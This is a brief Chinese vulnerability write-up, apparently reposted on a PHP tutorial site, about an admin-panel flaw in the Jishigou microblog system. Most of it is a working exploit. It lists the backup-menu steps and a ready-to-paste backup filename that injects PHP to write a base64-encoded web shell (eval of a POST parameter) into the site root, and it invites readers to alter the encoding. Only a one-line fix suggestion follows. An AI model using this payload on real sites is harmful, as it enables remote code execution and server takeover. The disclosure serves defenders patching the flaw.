记事狗微博 系统 ,后台存在设计缺陷,可导致进入后台者获得shell 1.系统工具->数据备份->自定义备份->选择一张数据量较小的表->更多选项->选择压缩备份文件->多分卷压缩成一个文件 2.在备份文件名中输入 ');file_put_contents(base64_decode('YS5waHA='),base64_decode('PD9waHAgZXZhbCgkX1BPU1RbYV0pPz4='));(' HdhCmsTest2cto测试数据 备份成功就在网站根目录生成a.php,内容为<?php eval($_POST[a])?> 其中base64_decode中编码自己改吧 修复方案: 备份文件名输入验证,过滤字符 作者 lxsec
查看更多关于记事狗微博后台拿shell - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13069